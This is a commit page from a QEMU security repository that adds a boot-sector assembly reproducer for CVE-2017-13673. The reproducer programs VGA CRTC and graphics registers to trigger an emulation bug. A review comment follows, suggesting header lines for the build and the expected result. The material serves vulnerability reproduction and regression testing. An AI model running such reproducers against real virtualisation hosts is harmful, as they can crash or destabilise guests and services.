author | Gerd Hoffmann <kraxel@redhat.com> | 2017-08-30 15:54:02 +0200 |
---|---|---|
committer | Gerd Hoffmann <kraxel@redhat.com> | 2017-08-30 15:54:24 +0200 |
commit | 2339ec544399cd66930643817ba1cb1094ddccfa (patch) | |
tree | 1a4f3edf18b81f1b628bdea7e1ddd9910f6bd9ef /boot-cve-2017-13673.asm | |
parent | 1808bb759313e69205f828d49fe9ffbcb1859377 (diff) | |
download | qemu-security-2339ec544399cd66930643817ba1cb1094ddccfa.tar.gz |
add cve-2017-13672 + cve-2017-13673 reproducers
Diffstat (limited to 'boot-cve-2017-13673.asm')
-rw-r--r-- | boot-cve-2017-13673.asm | 51 |
1 files changed, 51 insertions, 0 deletions
diff --git a/boot-cve-2017-13673.asm b/boot-cve-2017-13673.asm
new file mode 100644
index 0000000..21d5f3d
--- /dev/null
+++ b/boot-cve-2017-13673.asm
@@ -0,0 +1,51 @@
+; From: David Buchanan <d@vidbuchanan.co.uk>
+;
+; compiles to boot sector, pass as disk to qemu to run the code.
+;
+
+ BITS 16
+
+ ORG 0x7C00
+
+ mov dx, 0x3d4 ; start_addr high byte
+ mov al, 0x0c
+ out dx, al
+
+ mov dx, 0x3d5
+ mov al, 0xff
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x07
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x10
+ out dx, al
+
+
+ mov dx, 0x3d4 ; line_compare
+ mov al, 0x09
+ out dx, al
+
+ mov dx, 0x3d5
+ in al, dx
+ and al, ~0x40
+ out dx, al
+
+
+ mov dx, 0x3ce ; gfx mode
+ mov al, 0x06
+ out dx, al
+
+ mov dx, 0x3cf
+ mov al, 0x01
+ out dx, al
+
+
+ jmp $
+
+ TIMES 510-($-$$) DB 0
+ DW 0xAA55 ; boot signature
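Review bot: The header comment at the top of the new file says how to run the image but not what a run is expected to show, so the reproducer cannot serve as a pass/fail regression check as written. A header line for the build (`; build: nasm -f bin boot-cve-2017-13673.asm -o <image>`) and one for the outcome (`; expected: <result on an unfixed build> / <result on a fixed build>`) would close that gap. The two `; line_compare` comments are identical although they sit on different CRTC indexes; `; CRTC 0x07 (overflow): clear bit 4 = line_compare bit 8` and `; CRTC 0x09 (max scan line): clear bit 6 = line_compare bit 9` would say what each read-modify-write does. Both sequences keep whatever the firmware left in the remaining bits and the low line_compare byte is never written, so the header should also note that the result presumably depends on the firmware's initial VGA state.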